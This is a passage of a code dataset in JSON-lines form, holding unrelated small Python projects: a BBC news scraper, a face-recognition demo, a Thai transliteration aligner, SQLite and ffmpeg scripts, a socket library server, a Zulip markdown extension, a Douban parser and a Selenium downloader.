article.cssselect('h1')[0]\n art['title'] = ukmedia.FromHTMLOneLine(unicode(lxml.html.tostring(h1)))\n\n art['byline'] = u''\n authors = article.cssselect('.byline')\n if len(authors)>0:\n parts = [ukmedia.FromHTMLOneLine(a[0].text_content()) for a in authors]\n art['byline'] = u', '.join(parts)\n\n dt = article.cssselect('.date')[0].get('data-seconds')\n art['pubdate'] = datetime.utcfromtimestamp(int(dt))\n\n\n foo = article.cssselect('[property=\"articleBody\"]')\n if len(foo)==0:\n foo = article.cssselect('.map-body')\n body_div = foo[0]\n art['content'] = ukmedia.SanitiseHTML(unicode(lxml.html.tostring(body_div)))\n\n art['srcorgname']=u'bbcnews'\n return art\n\n\n\n# layout used by sports (and others?)\ndef extract_sports(art, doc):\n article = doc.cssselect('article.story')[0]\n\n h1 = article.cssselect('h1')[0]\n art['title'] = ukmedia.FromHTMLOneLine(unicode(lxml.html.tostring(h1)))\n\n byline = article.cssselect('.story__byline .gel-long-primer')[0]\n art['byline'] = ukmedia.FromHTMLOneLine(byline.text_content())\n\n dt = article.cssselect('.timestamp time')[0].get('data-timestamp')\n art['pubdate'] = datetime.utcfromtimestamp(int(dt))\n\n body_div = article.cssselect('.story-body')[0]\n art['content'] = ukmedia.SanitiseHTML(unicode(lxml.html.tostring(body_div)))\n\n art['srcorgname']=u'bbcnews'\n return art\n\n\ndef FindArticles(sesh):\n \"\"\" get current active articles by scanning each section page \"\"\"\n\n\n start_page = \"http://www.bbc.co.uk/news\"\n art_url_pat = re.compile(r\".*/[^/]*\\d{4}[^/]*/?$\", re.I)\n navsel = '.navigation-wide-list a'\n nav_blacklist = []\n domain_whitelist = ('www.bbc.co.uk','www.bbc.com')\n# article_blacklist = ['/picture/','/gallery','/live/','/video/','/audio/','/ng-interactive/']\n article_blacklist = []\n\n urls = 
ScraperUtils.GenericFindArtLinks(start_page,domain_whitelist,navsel,nav_blacklist,art_url_pat)\n arts = []\n for url in urls:\n good = True\n for blacklisted in article_blacklist:\n if blacklisted in url:\n good = False\n if good:\n arts.append(ContextFromURL(url))\n\n return arts\n\n\ndef TidyURL( url ):\n \"\"\" Tidy up URL - trim off any extra cruft (eg rss tracking stuff) \"\"\"\n o = urlparse.urlparse( url )\n url = urlparse.urlunparse( (o[0],o[1],o[2],'','','') );\n return url\n\n\ndef ContextFromURL( url ):\n \"\"\"Build up an article scrape context from a bare url.\"\"\"\n\n url = TidyURL(url)\n\n context = {}\n context['permalink'] = url\n context['srcurl'] = url\n context['srcorgname'] = u'bbcnews'\n context['lastseen'] = datetime.now()\n return context\n\n\nif __name__ == \"__main__\":\n ScraperUtils.scraper_main( FindArticles, ContextFromURL, Extract )\n\n","repo_name":"bcampbell/journalisted","sub_path":"jl/scraper/bbcnews.py","file_name":"bbcnews.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"71396790551","text":"import os\nimport numpy as np \nimport math\nimport time\nfrom matplotlib import pyplot as plt \nimport cv2\n\ndef collect_dataset():\n\timages = []\n\tlabels = []\n\tlabels_dic = {}\n\tpeople = [person for person in os.listdir(\"People/\")]\n\n\tfor i, person in enumerate(people):\n\t\tlabels_dic[i] = person\n\t\tfor image in os.listdir(\"People/\" + person):\n\t\t\timages.append(cv2.imread(\"People/\" + person + \"/\" + image, 0))\n\t\t\tlabels.append(i)\n\n\treturn (images, np.array(labels), labels_dic)\n\nimages, labels, labels_dic = collect_dataset()\n\nrec_eig = cv2.createEigenFaceRecognizer()\nrec_eig.train(images, labels)\n\nrec_fisher = cv2.createFisherFaceRecognizer()\nrec_fisher.train(images, labels)\n\nrec_lbph = cv2.createLBPHFaceRecognizer()\nrec_lbph.train(images, labels)\n\nprint(\"Trained Successfully!\")\n\nface = cv2.imread(\"7.jpg\", cv2.COLOR_BGR2GRAY)\n\npred, conf = rec_eig.predict(face)\nprint(\"Eigen Prediction-->\" + labels_dic[pred].capitalize() + \"\\tConfidence-->\" + str(conf) + \"\\n\")\n\npred, conf = rec_fisher.predict(face)\nprint(\"Fisher Prediction-->\" + labels_dic[pred].capitalize() + \"\\tConfidence-->\" + str(conf) + \"\\n\")\n\npred, conf = rec_lbph.predict(face)\nprint(\"LBPH Prediction-->\" + labels_dic[pred].capitalize() + \"\\tConfidence-->\" + str(conf) + \"\\n\")","repo_name":"ck090/FaceRecognition_Haar-Cascades_and_LBPH","sub_path":"OpenCV/recog.py","file_name":"recog.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"10246765350","text":"import re #นำเข้า regex : คือการกำหนดรูปแบบหรือกลุ่มคำ เพื่อเอาไว้ใช้ค้นหาข้อความต่างๆตามที่เราต้องการ\n\n# ฟังก์ชันการแปลง list เป็น string\ndef listToString(s): \n string = ''\n for char in s: \n string += char \n return string \n\n# ฟังก์ชันการแปลง list เป็น string พร้อมเครื่องหมายทับ ( / ) ่ต่อท้าย\ndef listToStringWithSlash(s): \n string = '' \n for char in s: \n string += char + '/' \n return string \ndef listToStringWithSpace(s): \n string = '' \n for char in s: \n string += char + ' ' \n if string[-1] == ' ':\n string = string[:-1]\n return string \n\n#การตัดตัวอักษรภาษาอังกฤษ\ndef alignment_en(text_en):\n \n #กำหนดการตัดพยัญชนะภาษาอังกฤษเมื่อพบพยัญชนะต่อไปนี้\n consonant_en = 'thm|sch|ch|ck|gh|gn|kh|ph|qu|rh|sh|th|wh|b|c|d|f|g|h|j|k|l|m|n|p|q|r|s|t|v|w|x|y|z' \n 
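# NOTE: longer clusters must precede their prefixes ('sch' before 'ch', 'th' before 't') because\r\n    # re.findall tries the alternatives left to right and keeps the first branch that matches;\r\n    # e.g. alignment_en('school') -> ['s', 'ch', 'oo', 'l']\r\n    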
#กำหนดการตัดสระภาษาอังกฤษเมื่อพบสระต่อไปนี้\n vowel_en = 'ai|ee|ea|eau|ei|eu|ie|io|oa|oe|oo|ou|ui|aea|ae|eou|aa|ao|au|eo|eu|ia|iu|oi|ua|ue|a|e|i|o|u|y'\n\n convo_en = \"r'\" + consonant_en + '|' + vowel_en +\"'\" #กำหนดรูปแบบในการค้นหา\n\n result = re.findall(convo_en, text_en) #เป็นคำสั่งที่ใช้ค้นหา โดย return กลับมาเป็น list ของผลลัพท์ทุกตัว\n if(len(result) == 1):\n return result\n if(result[0] == 'sch'):\n result[0] = 's'\n result.insert(1, 'ch')\n if (result[0] == 'p' and result[1] in {'n','t','s'}):\n result[0] = 'p' + result[1]\n del result[1]\n if (result[0] == 'k' and result[1] == 'n'):\n result[0] = 'k' + result[1]\n del result[1]\n return result\n\n#การตัดตัวอักษรไทย\ndef alignment_th(words):\n words = re.findall(r'[ก-ฮ]|ะ|า|ิ|ี|ุ|ู|เ|แ|โ|ไ|ใ|์|็|ั|ึ', words) #กำหนดการตัดพยัญชนะและสระภาษาไทย พร้อมทั้งกำหนดรูปแบบการค้นหา\n \n #ย้ายตำแหน่งการันต์ให้อยู่บนตัวอักษรก่อนหน้า ค/า/ร/ ์ > ค/า/ร์\n index = 0\n for char in words:\n if char in '์':\n words[index-1] = words[index-1] + words[index]\n words.remove('์')\n index += 1\n \n words = words + ['',''] #เติมค่าว่าง 2 ค่าลงใน list เพื่อป้องกัน loop index out of range เพราะมี index+2 ในขั้นตอนถัดไป\n \n size = len(words)-1 #กำหนดจำนวนรอบที่จะ loop ตามขนาดของ list-1\n \n for index in range (size): #ย้ายตำแหน่งสระประสม\n \n if index != 0 and index < size-1: #ค้นหาสระประสม 2 ตัวอักษร\n currentChar = words[index]\n previousChar = words[index-1]\n nextChar = words[index+1]\n nextChar2 = words[index+2]\n \n if ((previousChar == 'เ' and nextChar == 'อ') or \n (previousChar == 'เ' and nextChar == 'า') or\n (previousChar == 'เ' and nextChar == '็') or\n (previousChar == 'แ' and nextChar == '็') or\n (previousChar == 'เ' and nextChar == 'ิ')): #สระประสม 2 ตัวอักษรในภาษาอังกฤษ เ.อ > ไทเกอร์ , เ.า > เบราว์เซอร์, เ.็ > เจ็ต, แ.็ > แบล็ก, เ.ิ > เลิฟ\n # ย้ายตำแหน่งของสระประสมให้ไปอยู่หลังพยัญชนะของสระนั้น เช่น เ/ล/ ิ/ฟ > ล/เ.ิ>ฟ\n words[index] = previousChar + '.' + nextChar\n words[index-1] = currentChar\n words.append('')\n del words[index+1]\n \n if (previousChar == 'เ' and nextChar == 'ี' and nextChar2 == \"ย\"): #ค้นหาสระประสม 3 ตัวอักษรในภาษาอังกฤษ เ.ีย > นาตาเลีย\n # ย้ายตำแหน่งของสระประสมให้ไปอยู่หลังพยัญชนะของสระนั้น เช่น เ/ม/ ี/ย/ร์ > ม/เ.ีย/ร์\n words[index] = previousChar + '.' + nextChar + nextChar2 \n words[index-1] = currentChar\n del words[index+2]\n del words[index+1]\n words.append('')\n words.append('')\n \n if(currentChar == 'ิ' and nextChar == 'ว'):\n words[index] = '.' + currentChar + nextChar\n del words[index+1]\n words.append('')\n \n #ย้ายตำแหน่งสระเดี่ยว\n index = 0\n for char in words:\n if char in {'เ','แ','โ','ไ'}: #สระเดี่ยวในภาษาอังกฤษ เ. > เดย์, แ. > แคต, โ. > โซโลมอน, ไ. 
> ไอโอดีน\n # ย้ายตำแหน่งของสระเดี่ยวให้ไปอยู่หลังพยัญชนะของสระนั้น เช่น แ/ค/ต > ค/แ./ต\n temp = words[index]\n words[index] = words[index+1]\n words[index+1] = temp + '.'\n index +=1\n \n# #คำสั่งลบค่าว่างใน list \n# size = len(words)-1\n# for index in range(size+1,0,-1):\n# if words[index-1] == '':\n# words.remove('')\n \n #สระที่มีพยัญชนะต้นเป็น 'อ' \n if words[0] == 'อ':\n if words[1] in {'เ.','แ.','ไ.','โ.'}:\n words[0] = words[1] + 'อ'\n removeDot = re.findall(r'[ก-ฮ]|ะ|า|ิ|ี|ุ|ู|เ|แ|โ|ไ|ใ|์|็|ั', words[0])\n words[0] = listToString(removeDot)\n del words[1]\n elif words[1] in {'ะ','า','อ','ิ','ี','ั'}:\n words[0] = 'อ' + words[1]\n del words[1]\n index = 0 \n\n #คำสั่งลบค่าว่างใน list \n size = len(words)-1\n for index in range(size+1,0,-1):\n if words[index-1] == '':\n words.remove('') \n return words\n","repo_name":"tanukiraccoon/EN-to-TH-Transliteration","sub_path":"src/word_alignment.py","file_name":"word_alignment.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11518339112","text":"import sqlite3\n\nconnection = sqlite3.connect(\"MyDatabase.db\")\n\ncursor = connection.cursor()\n\n# Lấy data ra\ncursor.execute(\"\"\"\nSELECT MaLop, Tenlop, SoGio, HocPhi FROM LopHoc \nORDER BY HocPhi ASC, SoGio DESC\n\"\"\")\n\nrows = cursor.fetchall()\nprint(rows)\nprint(f\"Tổng cộng {len(rows)} dòng\")\nfor item in rows:\n print(item[0], item[1], item[2], item[3])\n\nconnection.close()\n","repo_name":"pynhatnghe/pynhatnghe.github.io","sub_path":"python11112021/buoi08_30.11_sqlite/DemoDatabase.py","file_name":"DemoDatabase.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31421829437","text":"'''\nThis script extracts the audio recording from the video file and stores it in a wav file\n'''\nimport logging\nimport os\nimport shutil\n\n\ndef run_extracting_audio(parallel_run_settings):\n '''\n Extract audio only from the video file\n :return: none\n '''\n logging.getLogger().setLevel(logging.INFO)\n\n video_list = []\n for file in os.listdir(parallel_run_settings['avi_path']):\n if file.endswith(\".avi\"):\n video_list.append(file)\n\n video_i = video_list[0]\n for video_i in video_list:\n video_path = os.path.join(parallel_run_settings['avi_path'], video_i)\n video_path = os.path.splitext(video_path)[0]\n os.system(\"ffmpeg -i {0}.avi -f wav -ab 192000 -ac 1 -vn {0}.wav\".format(video_path))\n\n shutil.move(video_path + '.wav',\n parallel_run_settings['wav_path'] + '/' + os.path.splitext(video_i)[0] + '.wav')\n\n log_text = \"Completed extracting audio for \"\n logging.info(log_text + video_i)\n\nif __name__ == \"__main__\":\n run_extracting_audio()\n","repo_name":"SpectData/MONAH","sub_path":"Python/Data_Preprocessing/Stage_1/FFMpeg/execute_extracting_audio.py","file_name":"execute_extracting_audio.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"40435890130","text":"\ndef main():\n people_number = int(input(\"Hello, how many people are in the dinner group:\"))\n if people_number > 8:\n print(\"Sorry, you will need to wait for a table.\")\n else:\n print(\"The table is ready, please come in!\")\n \n \n\n\nif __name__ == \"__main__\":\n 
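# prompt for the party size when the script is run directly\n    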
main()","repo_name":"fernunex/Theory","sub_path":"Chapter_7_Inputs/restaurant_seating.py","file_name":"restaurant_seating.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4600934078","text":"import socket\nimport pickle\nimport communication\nimport time\nfrom commands import *\n# library files\nfrom lib_files.book import Book\nfrom lib_files.reader import Reader\nfrom lib_files.library import Library\n\n# create library, readers: start\ntst_lib = Library( [], [] )\n\"\"\"\nbooks' data from here:\nhttps://www.penguin.co.uk/articles/2018/100-must-read-classic-books.html\n\"\"\"\n# add books\ntst_lib.add_book( Book( 1, \"Pride and Prejudice\", \"Jane Austen\", 1813 ) )\ntst_lib.add_book( Book( 2, \"To Kill a Mockingbird\", \"Harper Lee\", 1960 ) )\ntst_lib.add_book( Book( 3, \"The Great Gatsby\", \"F. Scott Fitzgerald\", 1925 ) )\ntst_lib.add_book( Book( 4, \"One Hundred Years of Solitude\", \"Gabriel García Márquez\", 1967 ) )\ntst_lib.add_book( Book( 5, \"In Cold Blood\", \"Truman Capote\", 1965 ) )\ntst_lib.add_book( Book( 6, \"Wide Sargasso Sea\", \"Jean Rhys\", 1966 ) )\ntst_lib.add_book( Book( 7, \"I Capture The Castle\", \"Dodie Smith\", 1948 ) )\ntst_lib.add_book( Book( 8, \"Jane Eyre\", \"Charlotte Bronte\", 1847 ) )\ntst_lib.add_book( Book( 9, \"Crime and Punishment\", \"Fyodor Dostoevsky\", 1866 ) )\ntst_lib.add_book( Book( 10, \"The Secret History\", \"Donna Tartt\", 1992 ) )\n# add readers\ntst_lib.add_reader( Reader( 1, \"Anton\", \"Skazka\", 23 ) )\ntst_lib.add_reader( Reader( 2, \"Alex\", \"Berezka\", 25 ) )\ntst_lib.add_reader( Reader( 3, \"Igor\", \"Talalaev\", 30 ) )\n# create library, readers: end\n\n_socket = socket.socket()\n_socket.bind( (socket.gethostname(), 56+13) )\n_socket.listen(1)\n_commands = \"List of possible commands:\\nGET_ALL_BOOKS_IN_LIBRARY\\nGET_ALL_AVAILABLE_BOOKS\\n\\\nADD_NEW_BOOK\\nDELETE_BOOK\\nGET_ALL_READERS\\nTAKE_A_BOOK\\nRETURN_A_BOOK\\n\"\nwhile True:\n clientsocket, address = _socket.accept()\n print(f\"Connection from {address} has been established.\")\n print(_commands)\n communication.sendMsg( _commands, clientsocket)\n time1 = time.time()\n while True:\n response = communication.readMsg(clientsocket)\n if(response):\n time1 = time.time()\n # handling queries to library from client\n if(response == GET_ALL_BOOKS_IN_LIBRARY):\n print(\"Ask for all book's list\")\n communication.sendMsg( tst_lib.all_books_server_ver(), clientsocket)\n elif(response == GET_ALL_AVAILABLE_BOOKS):\n print(\"Ask for available books\")\n communication.sendMsg(tst_lib.books_in_library_server_ver(), clientsocket)\n elif(response == ADD_NEW_BOOK):\n print(\"Add a book\")\n new_book = communication.readMsg(clientsocket)\n tst_lib.add_book(new_book)\n elif(response == DELETE_BOOK):\n print(\"Delete a book\")\n book_to_delete_ID = communication.readMsg(clientsocket)\n tst_lib.delete_book( int(book_to_delete_ID) )\n elif(response == GET_ALL_READERS):\n print(\"Ask for all readers\")\n communication.sendMsg(tst_lib.return_readers(), clientsocket)\n elif(response == TAKE_A_BOOK):\n print(\"Take a book\")\n book_ID, reader_ID = communication.readMsg(clientsocket)\n tst_lib.give_to_reader_via_IDs(int(book_ID), int(reader_ID))\n print(tst_lib.return_readers())\n elif(response == RETURN_A_BOOK):\n print(\"Take back a book\")\n book_ID, reader_ID = communication.readMsg(clientsocket)\n tst_lib.take_from_reader_via_IDs(int(book_ID), int(reader_ID))\n 
print(tst_lib.return_readers())\n if(time.time() - time1 > 7):\n clientsocket.close()\n print('Connection closed...')\n break","repo_name":"AndyKychinskey/Python_Course_2021","sub_path":"HW6/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43561113301","text":"class Money:\n def __init__(self,currency,whole_money, coins):\n self.currency = currency\n self.whole_money = whole_money\n self.coins = coins\n\n def info(self):\n print(f'whole_money: {self.whole_money}\\ncoins: {self.coins}\\ncurrency: {self.currency}')\n\n def redact(self):\n user = input('Какой параметр ты хочешь редактировать\\n')\n if user == 'currency':\n user = input('На какую валюту ты хочешь поменять?\\n')\n self.currency = user\n return 'замена произошла успешно'\n if user == 'whole_money':\n user = int(input('Ведите сумму\\n'))\n self.whole_money = user\n return 'замена произошла успешно'\n if user == 'coins':\n user = input('Введите копейки\\n')\n self.coins = int(user)\n return 'замена произошла успешно'\n\n\nmoney = Money(\"гривны\", 60, 40)\nmoney.info()\nmoney.redact()\nmoney.info()\n","repo_name":"rkAPCHA/homework_mystat","sub_path":"06.02.2022 часть 2/class Money.py","file_name":"class Money.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24759204971","text":"import re\n\nfrom markdown.extensions import Extension\nfrom markdown.preprocessors import Preprocessor\nfrom typing import Any, Dict, Optional, List, Tuple\nimport markdown\n\nSTART_TABBED_SECTION_REGEX = re.compile(r'^\\{start_tabs\\}$')\nEND_TABBED_SECTION_REGEX = re.compile(r'^\\{end_tabs\\}$')\nTAB_CONTENT_REGEX = re.compile(r'^\\{tab\\|\\s*(.+?)\\s*\\}$')\n\nCODE_SECTION_TEMPLATE = \"\"\"\n
<div class=\"code-section\" markdown=\"1\">\n{nav_bar}\n<div class=\"blocks\">\n{blocks}\n</div>\n</div>\n\"\"\".strip()\n\nNAV_BAR_TEMPLATE = \"\"\"\n<ul class=\"nav\">\n{tabs}\n</ul>\n\"\"\".strip()\n\nNAV_LIST_ITEM_TEMPLATE = \"\"\"\n<li data-language=\"{data_language}\">{name}</li>\n\"\"\".strip()\n\nDIV_TAB_CONTENT_TEMPLATE = \"\"\"\n<div data-language=\"{data_language}\" markdown=\"1\">\n{content}\n</div>
    \n\"\"\".strip()\n\n# If adding new entries here, also check if you need to update\n# tabbed-instructions.js\nTAB_DISPLAY_NAMES = {\n 'desktop-web': 'Desktop/Web',\n 'ios': 'iOS',\n 'android': 'Android',\n 'mac': 'macOS',\n 'windows': 'Windows',\n 'linux': 'Linux',\n 'python': 'Python',\n 'js': 'JavaScript',\n 'curl': 'curl',\n 'zulip-send': 'zulip-send',\n\n 'cloud': 'HipChat Cloud',\n 'server': 'HipChat Server or Data Center',\n}\n\nclass TabbedSectionsGenerator(Extension):\n def extendMarkdown(self, md: markdown.Markdown, md_globals: Dict[str, Any]) -> None:\n md.preprocessors.add(\n 'tabbed_sections', TabbedSectionsPreprocessor(md, self.getConfigs()), '_end')\n\nclass TabbedSectionsPreprocessor(Preprocessor):\n def __init__(self, md: markdown.Markdown, config: Dict[str, Any]) -> None:\n super(TabbedSectionsPreprocessor, self).__init__(md)\n\n def run(self, lines: List[str]) -> List[str]:\n tab_section = self.parse_tabs(lines)\n while tab_section:\n nav_bar = self.generate_nav_bar(tab_section)\n content_blocks = self.generate_content_blocks(tab_section, lines)\n rendered_tabs = CODE_SECTION_TEMPLATE.format(\n nav_bar=nav_bar, blocks=content_blocks)\n\n start = tab_section['start_tabs_index']\n end = tab_section['end_tabs_index'] + 1\n lines = lines[:start] + [rendered_tabs] + lines[end:]\n tab_section = self.parse_tabs(lines)\n return lines\n\n def generate_content_blocks(self, tab_section: Dict[str, Any], lines: List[str]) -> str:\n tab_content_blocks = []\n for index, tab in enumerate(tab_section['tabs']):\n start_index = tab['start'] + 1\n try:\n # If there are more tabs, we can use the starting index\n # of the next tab as the ending index of the previous one\n end_index = tab_section['tabs'][index + 1]['start']\n except IndexError:\n # Otherwise, just use the end of the entire section\n end_index = tab_section['end_tabs_index']\n\n content = '\\n'.join(lines[start_index:end_index]).strip()\n tab_content_block = DIV_TAB_CONTENT_TEMPLATE.format(\n data_language=tab['tab_name'],\n # Wrapping the content in two newlines is necessary here.\n # If we don't do this, the inner Markdown does not get\n # rendered properly.\n content='\\n{}\\n'.format(content))\n tab_content_blocks.append(tab_content_block)\n return '\\n'.join(tab_content_blocks)\n\n def generate_nav_bar(self, tab_section: Dict[str, Any]) -> str:\n li_elements = []\n for tab in tab_section['tabs']:\n li = NAV_LIST_ITEM_TEMPLATE.format(\n data_language=tab.get('tab_name'),\n name=TAB_DISPLAY_NAMES.get(tab.get('tab_name')))\n li_elements.append(li)\n return NAV_BAR_TEMPLATE.format(tabs='\\n'.join(li_elements))\n\n def parse_tabs(self, lines: List[str]) -> Optional[Dict[str, Any]]:\n block = {} # type: Dict[str, Any]\n for index, line in enumerate(lines):\n start_match = START_TABBED_SECTION_REGEX.search(line)\n if start_match:\n block['start_tabs_index'] = index\n\n tab_content_match = TAB_CONTENT_REGEX.search(line)\n if tab_content_match:\n block.setdefault('tabs', [])\n tab = {'start': index,\n 'tab_name': tab_content_match.group(1)}\n block['tabs'].append(tab)\n\n end_match = END_TABBED_SECTION_REGEX.search(line)\n if end_match:\n block['end_tabs_index'] = index\n break\n return block\n\ndef makeExtension(*args: Any, **kwargs: str) -> TabbedSectionsGenerator:\n return 
TabbedSectionsGenerator(kwargs)\n","repo_name":"18-2-SKKU-OSS/2018-2-OSS-L5","sub_path":"zerver/lib/bugdown/tabbed_sections.py","file_name":"tabbed_sections.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1127377615","text":"class Solution:\r\n # @param A : list of integers\r\n # @param B : integer\r\n # @return an integer\r\n def solve(self, A, B):\r\n A.sort()\r\n \r\n diff = A[-1] - A[0]\r\n for i in range(len(A) - 1):\r\n min_height = min(A[0] + B, A[i + 1] - B)\r\n max_height = max(A[i] + B, A[-1] - B)\r\n diff = min(diff, max_height - min_height)\r\n \r\n return diff\r\n","repo_name":"achie27/cp","sub_path":"arrays/minimise_max_height_diff.py","file_name":"minimise_max_height_diff.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11951106407","text":"class Aluno:\n def __init__(self, ra, nome, periodo):\n self.ra = ra\n self.nome = nome\n self.periodo = periodo\n\n def formatAluno(self):\n text = f'RA: {self.ra}\\n' + \\\n f'Nome: {self.nome}\\n' + \\\n f'Periodo: {self.periodo}\\n' + \\\n '==================================================\\n'\n\n return text\n","repo_name":"MSechineli/Sharding-SD-2022-1","sub_path":"pythongui/classes/aluno.py","file_name":"aluno.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72760631512","text":"import json\nimport logging\nimport re\nfrom datetime import datetime\n\nfrom bs4 import BeautifulSoup\n\n\ndef parse_list(html):\n \"\"\"\n 解析帖子列表\n \"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n rows = soup.select('table[class=\"olt\"] tr[class=\"\"]')\n posts = []\n for row in rows:\n link = row.select_one('td[class=\"title\"] a')\n time_text = row.select_one('td[class=\"time\"]').get_text()\n if re.match(r'\\d{2}-\\d{2} \\d{2}:\\d{2}', time_text):\n time_text = str(datetime.now().year) + \"-\" + time_text\n elif re.match(r'\\d{4}-\\d{2}-\\d{2}', time_text):\n # 跨年的日期,豆瓣显示的是 年-月-日\n time_text += ' 00:00'\n r_count = row.select_one('td[class=\"r-count\"]').get_text()\n author = row.select_one('td:nth-child(2) a')\n posts.append({\n \"title\": link['title'],\n \"url\": link['href'],\n \"reply_count\": int(r_count) if r_count else 0,\n \"time\": datetime.strptime(time_text, '%Y-%m-%d %H:%M'),\n \"author\": {\n \"name\": author.get_text(),\n \"url\": author['href']\n }\n })\n return posts\n\n\ndef parse_detail(html):\n \"\"\"\n 解析帖子详情\n \"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n title = soup.h1.get_text(strip=True)\n content = soup.find(\"div\", class_='topic-richtext').get_text(\"\\n\", True)\n author = soup.select_one('#topic-content h3 a')\n create_time = soup.select_one('#topic-content h3 span.create-time').get_text()\n rent = extract_rent(title + \"\\n\" + content)\n return {\n \"title\": title,\n \"rent\": rent,\n \"create_time\": datetime.strptime(create_time, '%Y-%m-%d %H:%M:%S'),\n \"content\": content,\n \"author\": {\n \"name\": author.get_text(),\n \"url\": author['href']\n }\n }\n\n\ndef extract_rent(text):\n \"\"\"\n 从文本中提取租金\n \"\"\"\n # 连续3-5位数字及前后2个字符的内容\n it = re.finditer(r\"(.[\\s\\D])(\\d{4})([\\s\\D].?)\", text)\n for match in it:\n # 过滤干扰项\n if re.match(r\"押金|补贴\", match.group(1)):\n continue\n if re.match(r\"米|年\", match.group(3)):\n continue\n return int(match.group(2))\n 
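# no rent-like number survived the filters; log the text for manual inspection\n    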
logging.warning(\"租金提取失败\\n%s\", text)\n","repo_name":"iszhouhua/douban-group","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"12698495912","text":"\"\"\"\nThere are 5 students in this class whose names and grades \nare assembled to build the following list:\n\npython students = [['Harry', 37.21], ['Berry', 37.21], \n ['Tina', 37.2], ['Akriti', 41], \n ['Harsh', 39]]\n\nThe lowest grade 37.2 of belongs to Tina. The second lowest \ngrade of belongs to both Harry and Berry, so we order \ntheir names *alphabetically* and *print* each name on a new line.\n\ninput:\n\t5\n\tHarry\n\t37.21\n\tBerry\n\t37.21\n\tTina\n\t37.2\n\tAkriti\n\t41\n\tHarsh\n\t39\n\noutput:\n\tBerry\n\tHarry\n\"\"\"\n\nif __name__ == '__main__':\n records = []\n for i in range(int(input())):\n name = input()\n score = float(input())\n student = [name, score]\n records.append(student)\n # print(records)\n \n scores = [x[1] for x in records]\n # print(scores)\n lst_scores = list(set(scores))\n lst_scores.sort()\n # print(lst_scores)\n sceond_lowest_score = lst_scores[1]\n \n second_lowest_stu = [x[0] for x in records if x[1] == sceond_lowest_score]\n second_lowest_stu.sort()\n for student in second_lowest_stu:\n print(student)","repo_name":"JeremiahZhang/gopython","sub_path":"python-daily/nested_lists.py","file_name":"nested_lists.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"25395559440","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 11 02:42:03 2021\n\n@author: aliasger\n\"\"\"\n\n# Importing relevant libraries\nimport pandas as pd\nfrom selenium import webdriver\nimport os\nimport time\n\n# Loading meta data from csv file\nmeta_data = pd.read_csv(\"scrape_meta_data.csv\")\n\nmeta_data = meta_data.to_dict()\nmeta_data_id = meta_data[\"ID\"]\nmeta_data_web = meta_data[\"Web No.\"]\n\nrecord_no = len(meta_data_id)\n\n# Setting up chromedriver profile for selenium\nprefs = {\n'download.default_directory': '/Users/aliasger/Desktop/Scraping',\n'download.prompt_for_download': False,\n'download.extensions_to_open': 'xml',\n'safebrowsing.enabled': True\n}\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('prefs',prefs)\noptions.add_argument(\"start-maximized\")\n# options.add_argument(\"disable-infobars\")\noptions.add_argument(\"--disable-extensions\")\noptions.add_argument(\"--safebrowsing-disable-download-protection\")\noptions.add_argument(\"safebrowsing-disable-extension-blacklist\")\ndriver = webdriver.Chrome(options=options, executable_path=r'/usr/local/bin/chromedriver')\n\n#Iterating and scraping through required piezometer data\nfor i in range(record_no):\n ID = meta_data_id[i]\n Web = meta_data_web[i]\n \n #https://sig.mapama.gob.es/WebServices/clientews/intranet/default.aspx?nombre=PIEZOMETROS&claves=DGAGUA.PIEZOMETROS.PIE_NUMPIE&valores=2980&origen=2&op=Exportar\n \n target_url = 'https://sig.mapama.gob.es/WebServices/clientews/intranet/default.aspx?nombre=PIEZOMETROS&claves=DGAGUA.PIEZOMETROS.PIE_NUMPIE&valores='+str(Web)+'&origen=2&op=Exportar'\n driver.get(target_url)\n \n time.sleep(5)\n \n uniqueName = str(ID)+\".xml\"\n os.rename(\"FichaExportacion.xml\", 
